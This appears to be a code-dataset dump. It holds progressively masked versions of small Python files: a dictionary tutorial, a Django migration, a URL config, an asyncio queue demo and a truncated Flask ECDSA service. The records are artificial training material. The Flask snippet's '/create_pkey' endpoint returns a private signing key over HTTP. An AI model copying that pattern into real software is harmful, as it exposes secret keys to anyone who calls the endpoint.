@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
pass
class Main():
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {
'1975': 'Holy Grail',
'1979': 'Life of Brain',
'1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {
'Holy Grail': '1975',
'Life of Brain': '1979',
'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[(2, 3, 6)])
else:
print(0)
try:
print(Matrix[(2, 3, 6)])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
'name': 'Bob',
'jobs': ['developer', 'manager'],
'web': 'www.bobs.org/?Bob',
'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
'name': 'other',
'jobs': ['hr', 'manager'],
'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
# keys()/values()/items() return view objects, not lists; views do not
# support indexing, so convert to a list first.
k = d.keys()
print(k)
# print(k[0])
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
# Iterating d.keys() and iterating d directly are equivalent.
for k in d.keys(): print(k)
for key in d: print(key)
# Sorting the keys of {'a': 1, 'b': 2, 'c': 3}
print(d)
Ks = d.keys()
print(Ks)
# A view has no .sort(); materialize it as a list to sort in place ...
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
# ... or pass the view straight to sorted(), which returns a new list.
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks): print(k, D[k])
|
flexible
|
{
"blob_id": "797cedc9dc2a47713b9554e4f5975a4505ecf6d3",
"index": 9568,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\n<mask token>\nprint(d)\n<mask token>\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\n<mask token>\nprint(d)\ndel d['eggs']\nprint(d)\n<mask token>\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\n<mask token>\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\n<mask token>\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\n<mask token>\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\n<mask token>\nprint(year_)\n<mask token>\nprint(table2[K])\n<mask token>\nprint(key)\n<mask token>\nprint(key)\n<mask token>\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\n<mask token>\nprint(rec['name'])\n<mask token>\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\n<mask token>\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\n<mask token>\ndb['bob']['jobs']\n<mask token>\nprint(age_)\n<mask token>\nprint(d)\n<mask token>\nprint(di)\n<mask token>\nprint(di)\n<mask token>\nprint(fromkeys)\n<mask token>\nprint(iterator)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d2)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(k)\nprint(list(k)[0])\n<mask token>\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in 
d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\n<mask token>\nprint(Ks)\n<mask token>\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\n<mask token>\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-4": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\nd = {'name': 'Bob', 'age': 40}\nprint(d)\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\nd['ham'] = ['grill', 'bake', 'fry']\nprint(d)\ndel d['eggs']\nprint(d)\nd['brunch'] = 'Bacon'\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\nd2 = {'toast': 4, 'muffin': 5}\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\ntable = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':\n 'The Meaning of Life'}\nyear = '1983'\nmovie = table[year]\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\ntable2 = {'Holy Grail': '1975', 'Life of Brain': '1979',\n 'The Meaning of Life': '1983'}\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\nyear_ = [title for title, year in table2.items() if year == '1975']\nprint(year_)\nK = 'Holy Grail'\nprint(table2[K])\nV = '1975'\nkey = [key for key, value in table2.items() if value == V]\nprint(key)\nkey = [key for key in table2.keys() if table2[key] == V]\nprint(key)\nMatrix = {}\nMatrix[2, 3, 4] = 88\nMatrix[7, 8, 9] = 99\nX = 2\nY = 3\nZ = 4\nz_ = Matrix[X, Y, Z]\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\nrec = {}\nrec['name'] = 'Bob'\nrec['age'] = 40.5\nrec['job'] = 'developer/manager'\nprint(rec['name'])\nrec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':\n 'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 
12345}}\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\ndb = []\nother = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',\n 'home': {'state': 'Overworked', 'zip': 55555}}\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\ndb = {}\ndb['bob'] = rec\ndb['sue'] = other\ndb['bob']['jobs']\nage_ = {'name': 'Bob', 'age': 40}\nprint(age_)\nd = {}\nd['name'] = 'sue'\nd['age'] = 50\nprint(d)\ndi = dict(name='Bob', age=56)\nprint(di)\ndi = dict([('name', 'Bob'), ('age', 55)])\nprint(di)\nfromkeys = dict.fromkeys(['a', 'b'], 0)\nprint(fromkeys)\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\nprint(iterator)\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\nprint(d)\nd = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}\nprint(d)\nd = {x: (x ** 2) for x in [1, 2, 3, 4]}\nprint(d)\nd2 = {x: (x ** 2) for x in range(4)}\nprint(d2)\nd = {c: (c * 4) for c in 'SPAM'}\nprint(d)\nd = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}\nprint(d)\nd = dict.fromkeys(['a', 'b', 'c'], 0)\nprint(d)\nd = {k: (0) for k in ['a', 'b', 'c']}\nprint(d)\nd = dict.fromkeys('spam')\nprint(d)\nd = dict.fromkeys('spam', 0)\nprint(d)\nd = {k: None for k in 'spam'}\nprint(d)\nd = dict(a=1, b=2, c=3)\nprint(d)\nk = d.keys()\nprint(k)\nprint(list(k)[0])\nv = d.values()\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\nKs = d.keys()\nprint(Ks)\nKs = list(Ks)\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\nD = {'b': 2, 'c': 3, 'a': 1}\nKs = D.keys()\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-5": "#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n@version: ??\r\n@author: ami\r\n@license: Apache Licence \r\n@file: dictTest.py\r\n@time: 2019/9/25 18:26\r\n@tools: PyCharm\r\n\"\"\"\r\n\r\n\r\ndef func():\r\n pass\r\n\r\n\r\nclass Main():\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n\r\nd = {'name': 'Bob', 'age': 40}\r\nprint(d)\r\n\r\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\r\nprint(d['spam'])\r\nprint(d)\r\n\r\nprint(len(d))\r\nprint('ham' in d)\r\nprint(list(d.keys()))\r\nprint(list(d.values()))\r\nprint(list(d.items()))\r\n\r\nfor i in d.items():\r\n print(i)\r\n\r\nd['ham'] = ['grill', 'bake', 'fry']\r\nprint(d)\r\n\r\ndel d['eggs']\r\nprint(d)\r\nd['brunch'] = 'Bacon'\r\nprint(d)\r\n\r\nprint(list(d.values()))\r\nprint(list(d.keys()))\r\nprint(list(d.items()))\r\n\r\nprint(d.get('ham'))\r\nprint(d.get('toast'))\r\nprint(d.get('toast', 88))\r\nprint(d)\r\nd2 = {'toast': 4, 'muffin': 5}\r\nd.update(d2)\r\nprint(d)\r\nprint(d.pop('muffin'))\r\nprint(d.pop('toast'))\r\nprint(d)\r\n\r\ntable = {\r\n '1975': 'Holy Grail',\r\n '1979': 'Life of Brain',\r\n '1983': 'The Meaning of Life'\r\n}\r\nyear = '1983'\r\nmovie = table[year]\r\nprint(movie)\r\n\r\nfor year in table:\r\n print(year + '\\t' + table[year])\r\n\r\ntable2 = {\r\n 'Holy Grail': '1975',\r\n 'Life of Brain': '1979',\r\n 'The Meaning of Life': '1983'\r\n}\r\nprint(table2['Holy Grail'])\r\nprint(list(table2.items()))\r\n\r\nyear_ = [title for (title, year) in table2.items() if year == '1975']\r\nprint(year_)\r\n\r\nK = 'Holy Grail'\r\nprint(table2[K])\r\nV = '1975'\r\nkey = [key for (key, value) in table2.items() if value == V]\r\nprint(key)\r\nkey = [key for key in table2.keys() if table2[key] == V]\r\nprint(key)\r\n\r\nMatrix = {}\r\nMatrix[(2, 3, 4)] = 88\r\nMatrix[(7, 8, 9)] = 99\r\nX = 2\r\nY = 3\r\nZ = 4\r\nz_ = Matrix[(X, Y, Z)]\r\nprint(z_)\r\nprint(Matrix)\r\n\r\nif (2, 3, 6) in Matrix:\r\n print(Matrix[(2, 3, 6)])\r\nelse:\r\n 
print(0)\r\n\r\ntry:\r\n print(Matrix[(2, 3, 6)])\r\nexcept KeyError:\r\n print(0)\r\n\r\nprint(Matrix.get((2, 3, 4), 0))\r\nprint(Matrix.get((2, 3, 6), 0))\r\n\r\nrec = {}\r\nrec['name'] = 'Bob'\r\nrec['age'] = 40.5\r\nrec['job'] = 'developer/manager'\r\nprint(rec['name'])\r\n\r\nrec = {\r\n 'name': 'Bob',\r\n 'jobs': ['developer', 'manager'],\r\n 'web': 'www.bobs.org/?Bob',\r\n 'home': {'state': 'Overworked', 'zip': 12345}\r\n}\r\nprint(rec['name'])\r\nprint(rec['jobs'])\r\nprint(rec['jobs'][1])\r\nprint(rec['home']['zip'])\r\ndb = []\r\nother = {\r\n 'name': 'other',\r\n 'jobs': ['hr', 'manager'],\r\n 'web': 'www.hr.org',\r\n 'home': {'state': 'Overworked', 'zip': 55555}\r\n}\r\ndb.append(rec)\r\ndb.append(other)\r\nprint(db[0]['jobs'])\r\n\r\ndb = {}\r\ndb['bob'] = rec\r\ndb['sue'] = other\r\ndb['bob']['jobs']\r\n\r\nage_ = {'name': 'Bob', 'age': 40}\r\nprint(age_)\r\n\r\nd = {}\r\nd['name'] = 'sue'\r\nd['age'] = 50\r\nprint(d)\r\n\r\ndi = dict(name='Bob', age=56)\r\nprint(di)\r\n\r\ndi = dict([('name', 'Bob'), ('age', 55)])\r\nprint(di)\r\n\r\nfromkeys = dict.fromkeys(['a', 'b'], 0)\r\nprint(fromkeys)\r\n\r\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\r\nprint(iterator)\r\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\r\nprint(d)\r\n\r\nd = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}\r\nprint(d)\r\n\r\nd = {x: x ** 2 for x in [1, 2, 3, 4]}\r\nprint(d)\r\nd2 = {x: x ** 2 for x in range(4)}\r\nprint(d2)\r\n\r\nd = {c: c * 4 for c in 'SPAM'}\r\nprint(d)\r\n\r\nd = {c.lower(): c + '!' 
for c in ['spam', 'eggs', 'ham']}\r\nprint(d)\r\n\r\nd = dict.fromkeys(['a', 'b', 'c'], 0)\r\nprint(d)\r\n\r\nd = {k: 0 for k in ['a', 'b', 'c']}\r\nprint(d)\r\n\r\nd = dict.fromkeys('spam')\r\nprint(d)\r\nd = dict.fromkeys('spam', 0)\r\nprint(d)\r\n\r\nd = {k: None for k in 'spam'}\r\nprint(d)\r\n\r\nd = dict(a=1, b=2, c=3)\r\nprint(d)\r\nk = d.keys()\r\nprint(k)\r\n# print(k[0])\r\nprint(list(k)[0])\r\nv = d.values()\r\nprint(v)\r\nprint(list(v))\r\nprint(d.items())\r\nprint(list(d.items()))\r\n\r\nfor k in d.keys(): print(k)\r\n\r\nfor key in d: print(key)\r\n\r\n# 排序{'a': 1, 'b': 2, 'c': 3}\r\nprint(d)\r\nKs = d.keys()\r\nprint(Ks)\r\nKs = list(Ks)\r\nKs.sort()\r\nprint(Ks)\r\nfor k in Ks: print(k, d[k])\r\n\r\nprint(\"-------\"*6)\r\nD = {'b': 2, 'c': 3, 'a': 1}\r\nKs = D.keys()\r\nfor k in sorted(Ks): print(k, D[k])\r\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('products', '0007_auto_20150904_1320')]
operations = [migrations.AddField(model_name='customer', name=
'in_close', field=models.BooleanField(default=False)), migrations.
AddField(model_name='customer', name='time_close', field=models.
DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34,
205639))), migrations.AddField(model_name='historicalcustomer',
name='in_close', field=models.BooleanField(default=False)),
migrations.AddField(model_name='historicalcustomer', name=
'time_close', field=models.DateTimeField(default=datetime.datetime(
2015, 11, 26, 23, 25, 34, 205639)))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [('products', '0007_auto_20150904_1320')]
operations = [migrations.AddField(model_name='customer', name=
'in_close', field=models.BooleanField(default=False)), migrations.
AddField(model_name='customer', name='time_close', field=models.
DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34,
205639))), migrations.AddField(model_name='historicalcustomer',
name='in_close', field=models.BooleanField(default=False)),
migrations.AddField(model_name='historicalcustomer', name=
'time_close', field=models.DateTimeField(default=datetime.datetime(
2015, 11, 26, 23, 25, 34, 205639)))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
    """Add close-tracking fields to Customer and its historical shadow model.

    Adds a boolean ``in_close`` flag and a ``time_close`` timestamp to both
    ``customer`` and ``historicalcustomer`` (presumably a history/audit
    copy of the model — confirm against the app's models).
    """

    dependencies = [
        ('products', '0007_auto_20150904_1320'),
    ]

    operations = [
        migrations.AddField(
            model_name='customer',
            name='in_close',
            field=models.BooleanField(default=False),
        ),
        # The default datetime was frozen when the migration was generated
        # (2015-11-26); it is a fixed literal, not "now" at migrate time.
        migrations.AddField(
            model_name='customer',
            name='time_close',
            field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),
        ),
        # Mirror the same two fields on the historical model.
        migrations.AddField(
            model_name='historicalcustomer',
            name='in_close',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='historicalcustomer',
            name='time_close',
            field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),
        ),
    ]
|
flexible
|
{
"blob_id": "fd52379d125d6215fe12b6e01aa568949511549d",
"index": 6964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('products', '0007_auto_20150904_1320')]\n operations = [migrations.AddField(model_name='customer', name=\n 'in_close', field=models.BooleanField(default=False)), migrations.\n AddField(model_name='customer', name='time_close', field=models.\n DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, \n 205639))), migrations.AddField(model_name='historicalcustomer',\n name='in_close', field=models.BooleanField(default=False)),\n migrations.AddField(model_name='historicalcustomer', name=\n 'time_close', field=models.DateTimeField(default=datetime.datetime(\n 2015, 11, 26, 23, 25, 34, 205639)))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n dependencies = [('products', '0007_auto_20150904_1320')]\n operations = [migrations.AddField(model_name='customer', name=\n 'in_close', field=models.BooleanField(default=False)), migrations.\n AddField(model_name='customer', name='time_close', field=models.\n DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, \n 205639))), migrations.AddField(model_name='historicalcustomer',\n name='in_close', field=models.BooleanField(default=False)),\n migrations.AddField(model_name='historicalcustomer', name=\n 'time_close', field=models.DateTimeField(default=datetime.datetime(\n 2015, 11, 26, 23, 25, 34, 205639)))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('products', '0007_auto_20150904_1320'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='in_close',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='customer',\n name='time_close',\n field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),\n ),\n migrations.AddField(\n model_name='historicalcustomer',\n name='in_close',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='historicalcustomer',\n name='time_close',\n field=models.DateTimeField(default=datetime.datetime(2015, 11, 26, 23, 25, 34, 205639)),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = 'alph 1.0'
<|reserved_special_token_1|>
__version__ = "alph 1.0"
|
flexible
|
{
"blob_id": "2c4eb07a32c6903ae31006f42c13c55e6cc42eb5",
"index": 5245,
"step-1": "<mask token>\n",
"step-2": "__version__ = 'alph 1.0'\n",
"step-3": "__version__ = \"alph 1.0\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.conf.urls import url
from . import views
# URL routes for this app, mapping path regexes to view callables.
urlpatterns = [
    url(r'^stats/$', views.get_stats, name='stats'),
    url(r'^follow/me/$', views.follow_me, name='follow_me'),
    url(r'^follower/confirm/$', views.confirm_follower, name='follower_confirm'),
    # NOTE(review): the three patterns below are not end-anchored with $,
    # so they match any URL that merely starts with the prefix — confirm
    # this is intentional.
    url(r'^execute/', views.execute, name='executed'),
    url(r'^output/', views.update_output, name='output'),
    url(r'^lead/', views.lead_nodes, name='lead'),
]
|
normal
|
{
"blob_id": "33b68246dd3da9561c1d4adb5a3403cba656dcee",
"index": 9175,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^stats/$', views.get_stats, name='stats'), url(\n '^follow/me/$', views.follow_me, name='follow_me'), url(\n '^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url('^execute/', views.execute, name='executed'), url('^output/', views\n .update_output, name='output'), url('^lead/', views.lead_nodes, name=\n 'lead')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^stats/$', views.get_stats, name='stats'), url(\n '^follow/me/$', views.follow_me, name='follow_me'), url(\n '^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url('^execute/', views.execute, name='executed'), url('^output/', views\n .update_output, name='output'), url('^lead/', views.lead_nodes, name=\n 'lead')]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^stats/$', views.get_stats, name='stats'),\n url(r'^follow/me/$', views.follow_me, name='follow_me'),\n url(r'^follower/confirm/$', views.confirm_follower, name='follower_confirm'),\n url(r'^execute/', views.execute, name='executed'),\n url(r'^output/', views.update_output, name='output'),\n url(r'^lead/', views.lead_nodes, name='lead'),\n\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
async def consumer(queue, name):
while True:
val = await queue.get()
print(f"{name} get a val: {val} at {time.strftime('%X')}")
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
await asyncio.gather(*tasks, return_exceptions=True)
asyncio.run(main())
<|reserved_special_token_1|>
import time
import random
import asyncio
async def consumer(queue, name):
while True:
val = await queue.get()
print(f"{name} get a val: {val} at {time.strftime('%X')}")
await asyncio.sleep(1)
async def producer(queue, name):
for i in range(20):
await queue.put(i)
print(f'{name} put a val: {i}')
await asyncio.sleep(0.1)
async def main():
queue = asyncio.Queue()
tasks = [asyncio.create_task(producer(queue, 'producer'))]
for i in range(3):
tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))
await asyncio.gather(*tasks, return_exceptions=True)
asyncio.run(main())
<|reserved_special_token_1|>
#!usr/bin/python
# -*- coding:utf8 -*-
import time
import random
import asyncio
async def consumer(queue, name):
    """Endlessly pull values from *queue*, printing each with a timestamp.

    Runs forever: there is no termination condition, so the task must be
    cancelled (or the program killed) to stop it.
    """
    while True:
        val = await queue.get()
        print(f'{name} get a val: {val} at {time.strftime("%X")}')
        # Simulate one second of per-item processing work.
        await asyncio.sleep(1)
async def producer(queue, name):
    """Put the integers 0..19 on *queue*, pausing 0.1 s between puts."""
    for i in range(20):
        await queue.put(i)
        print(f'{name} put a val: {i}')
        # Throttle production so consumers can interleave.
        await asyncio.sleep(0.1)
async def main():
    """Run one producer against three consumers sharing a single queue."""
    queue = asyncio.Queue()

    tasks = [asyncio.create_task(producer(queue, 'producer'))]
    for i in range(3):
        tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))

    # await asyncio.sleep(10)

    # NOTE(review): the consumers loop forever, so this gather never
    # completes and the program does not terminate on its own.
    await asyncio.gather(*tasks, return_exceptions=True)


# start = time.perf_counter()
asyncio.run(main())
# end = time.perf_counter()
# print(end - start)
|
flexible
|
{
"blob_id": "e1172e2d9f20e56241829b3e4ccb4bcf6b5440be",
"index": 9233,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f\"{name} get a val: {val} at {time.strftime('%X')}\")\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\nasyncio.run(main())\n",
"step-3": "import time\nimport random\nimport asyncio\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f\"{name} get a val: {val} at {time.strftime('%X')}\")\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\nasyncio.run(main())\n",
"step-4": "#!usr/bin/python\n# -*- coding:utf8 -*-\nimport time\nimport random\nimport asyncio\n\n\nasync def consumer(queue, name):\n while True:\n val = await queue.get()\n print(f'{name} get a val: {val} at {time.strftime(\"%X\")}')\n await asyncio.sleep(1)\n\n\nasync def producer(queue, name):\n for i in range(20):\n await queue.put(i)\n print(f'{name} put a val: {i}')\n await asyncio.sleep(0.1)\n\n\nasync def main():\n queue = asyncio.Queue()\n\n tasks = [asyncio.create_task(producer(queue, 'producer'))]\n for i in range(3):\n tasks.append(asyncio.create_task(consumer(queue, f'consumer_{i}')))\n\n # await asyncio.sleep(10)\n\n await asyncio.gather(*tasks, return_exceptions=True)\n\n\n# start = time.perf_counter()\nasyncio.run(main())\n# end = time.perf_counter()\n# print(end - start)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
<|reserved_special_token_0|>
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
